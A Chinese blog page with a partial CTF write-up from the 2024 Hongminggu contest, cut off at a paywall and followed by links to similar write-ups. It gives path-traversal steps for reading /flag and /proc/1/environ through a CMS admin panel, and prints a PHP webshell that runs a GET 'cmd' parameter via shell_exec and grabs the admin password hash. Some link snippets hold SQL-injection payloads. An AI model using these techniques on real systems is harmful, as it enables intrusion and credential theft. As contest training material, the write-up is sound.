2024红明谷杯部分WP_netpixeljihad(1)

最新推荐文章于 2024-05-05 15:39:56 发布
最新推荐文章于 2024-05-05 15:39:56 发布
阅读量902 收藏 20
点赞数 15
CC 4.0 BY-SA版权
分类专栏: 2024年程序员学习 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_83974064/article/details/137639433
本文详细解析了网络安全挑战,包括Dreamer_revenge、hacker、阿尼亚和X光的秘密等,涉及文件读取、数据库解密、图片隐藏信息提取等多个环节。通过分享解题过程,介绍了学习网络安全的成长路线、视频教程、书籍、源码和面试题等资源,旨在帮助网络安全爱好者系统学习和提升技能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

image.png
考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag
点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。
image.png
在封面模版处,添加路径为:
../../../../../../../../../../flag
image.png

点击保存,访问前台,重新访问对应的顶级栏目,得到flag
image.png

0x02 Dreamer_revenge

image.png
跟上一个题一样
第一种思路是跟上一个题目一样,只不过把访问的文件改成../../.../../../../proc/1/environ
image.png
第二种思路是利用后台模板管理可以任意编辑的漏洞
先把default_v2目录复制一份,修改成default_v3
修改其中的theme.json文件。将其中的themePath值修改成../../../../../../../../../../../../../../
image.png
然后打包default_v3default_v3.zip,到后台风格管理处上传zip文件并启用主题。

Snipaste_2023-04-19_15-54-15.png
此时再去访问模版管理即可从根目录访问所有文件
image.png
跟之前一样,访问/proc/1/environ,即可找到flag
Snipaste_2023-04-19_15-53-38.png

0x03 hacker

<?php $servername="127.0.0.1";
$username="root";
$password="123456";
$dbname="zentao";
$conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password);
$conn->setAttribute(PDO::ATTR\_ERRMODE,PDO::ERRMODE\_EXCEPTION);
$stmt=$conn->prepare("SELECT password FROM zt\_user WHERE account=\'admin\'");
$stmt->execute();
$result=$stmt->fetch(PDO::FETCH\_ASSOC);
$conn=null;
$param=$\_GET["cmd"];
$password=$result["password"];
$output=shell\_exec($param);
$hex\_output=bin2hex($output);
$hex\_password=bin2hex($password);
$len\_output=strlen($hex
最低0.47元/天 解锁文章

200万优质内容无限畅学
2024明谷部分WP_netpixeljihad
2401_83974064的博客
04-11 1041
然后打包default_v3成,到后台风格管理处上传zip文件并启用主题。此时再去访问模版管理即可从根目录访问所有文件跟之前一样,访问,即可找到flag。
2023明谷部分WP
就这样吧
04-21 1411
2023明谷部分WP
明谷web部分wp
lllffg的博客
04-07 331
明谷web部分wp 第十四距离线下赛差一点点,原地裂开 happysql username="||(1)%23&password=1 成功回显 username="||(select(12)regexp(12))%23&password=1 成功回显 username="||(select(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats)regexp("f1ag"))%23&passw
第四届明谷 web(部分)wp
2301_77392802的博客
04-05 573
可以本地起个容器 然后用get_class函数进行输出 class@anonymous%00/var/www/html/flag.php:7$0。/rust_code路由里传data都会被编译 利用编译读flag。在flag.php传入参数?exphpPhp8即可获得源码。然后su admin 填入密码 cat /flag即可。www.zip泄露了admin的账号密码。然后重开题目靶机输入就可以得到flag。提示访问flag.php,但回显no。信息·搜集 找到了一篇文章。用这个工具进行测信道攻击。
明谷“ 初赛 web 部分WP
feng的博客
04-03 1513
前言 参加了第一届明谷的比赛,4道web当时只做出2道,第三道苦于那个数据库的密码不知道,赛后才问了别的师傅才知道是123456这个弱密码。。。草了。 因为实在太懒了。。。本来不想专门写这篇WP的,因为当时做题的时候只潦草的记下了当时的wp,用的姿势可能还不是最简便的方式。但是想想,不写的话总感觉缺了点什么,所以就把我当时潦草的wp记录给复制粘贴过来了(笑),见谅见谅。 happysql ban了单引号,但是查询的语句中用的是双引号,拿双引号闭合,如果登录成功的会302跳转到home.php,因此可以布尔
“天一永安2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛-部分MISC、WEB、RE-WP
最新发布
weixin_62467741的博客
05-05 1045
1.png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码。简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到。F12被禁了,URL前加view-source:,源码得到flag。2.搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示。先逆key,追踪key和key1,得到值,写解密脚本。3.直接搜这个解密网站。
[明谷]wp(正则注入,hex绕过)
Huamang的博客
04-03 858
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
明谷数据安全大赛 技能场景赛 部分wp
Alanpipi*的博客
04-03 5151
欢迎使用Markdown编辑器 新的改变 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 Markdown文章功能; 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间; 增加了 检查
[明谷CTF 2021]write_shell
m0_63045593的博客
04-20 320
[明谷CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
2023明谷部分WP_netpixeljihad(1),腾讯T4架构师
2401_83740129的博客
04-17 445
去除重复的,总共有八段数据,一开始测试的时候发现除了第一条和第四条能成功解密,其他都是乱码,经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断,其中[1:]的还得去掉最后一位,才能正确解密,而且解密出来的明文在开头还会丢失一两位字符。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。有了加密逻辑以及密码,就可以解密数据了,外带的数据也被wireshark截获了。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
CTF 欢迎来到地狱
最爱帆帆的博客
03-29 7448
欢迎来到地狱 地狱第一层 ​ 下载相关文件,得到三个文件: ​ 根据提示,先打开地狱伊始.jpg,发现文件损坏,用wenhex软件打,发现是jpg的头文件没有写全。 ​ 在文件头加上FF D8 FF E0 后,文件便可打开,简单介绍一下jpg的文件头(如上),前八字节为标志位,长度字节流为00 10 = 16,后面14个字节为内容。4A 46 49 46是jpg的ascii码,后面10个字节应...
图片隐写练习题
m0_68265379的博客
04-23 1136
第一题 先把图片拉到010 editor中查看,然后一点一点的往下拉会发现: flag就在其中,所以flag{6666666666666666} 还有一种方法,右键图片属性,打开后点击详细属性 也可以找到flag{6666666666666666} 第二题 第一步,把图片拉入010editor 检索一遍后,并没有发现flag,这时候就要换一种思路了。 运用另一种工具stegsovle,在此工具中打开题目图片。 然后点击箭头来检索,在red p...
明谷----阿尼亚
qq_51233573的博客
05-15 409
010打开图片一串数字,当时zsteg扫出来了但是没深入分析。赛后跟其他师傅交流说可以爆破找了一个在线进行乱码恢复的。根据图片的名字可以搜到这个在线解码图片的网站。猫哥出的题,比赛时没做出来后面做出来了。根据之前得到的密码解密出加密的内容。再转一次发现得到一段乱码。得到密码为 简单的编码。解密得到最后的flag。
收录CTF MISC方向中使用的在线工具网站
热门推荐
末初 · mochu7
01-01 1万+
收录笔者在做misc题目时使用到的各种工具站或,持续更新.....建议收藏
2023明谷misc方向wp
toto的博客
04-19 2287
经过对照,flag生成的原理是16进制数,所以不可能超过f,第一位CT只有一个字符4(TCT)符合条件,那么只用考虑第二位的AC。第二位的AC可能是 b.e.f这三个,一个个试过去,当输入b的时候直接正确。读取最后三帧图片的r,g,b值时发现17,18,19三帧图片刚好都只有一个通道,将三张图片的rgb通道都提取出来组成新的一张图片。现在明文密文都有了,开始写解密脚本(这里写了两个,一个php,一个python,反正都是用chatgpt嗦的)一个简单的异或加密,但是不知道admin的key。
2023明谷密码wp
mxx307的博客
04-19 923
2023明谷密码wp
2024明谷——Misc 加密的流量
Amherstieae的博客
04-19 768
这里是贝塔贝塔,照例来一段闲聊打比赛但赛前一波三折,又是成功签到的一个比赛说起来比赛全名叫明谷卫星应用数据安全场景赛,但好像真的跟卫星的关系不大,没有bin方向的赛题,只有crypto、misc和web,我不好评价,我不好说.wav给大家推荐 知我 ,真的很好听!【进入正文】
BlueTeam 取证
人饭子的博客
10-30 2291
取证 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 数据恢复 操作系统取证 Android Windows Linux 文件取证 压缩包 爆破压缩包 伪加密 明文攻击 CRC32碰撞 视频 Deegger_Embedder...
2023明谷部分WP_netpixeljihad网络安全社招面试题
碧海朝天素
04-05 493
点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
欢迎来到地狱 WriteUp(2019暑假CTF第一周misc)
afu42832的博客
07-09 578
目录 0707,0708,0709 题目地址:欢迎来到地狱 1.地狱伊始.jpg 1.5地狱之声.wav 2.第二层地狱.docx 3.快到终点了.zip 参考 0707,0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值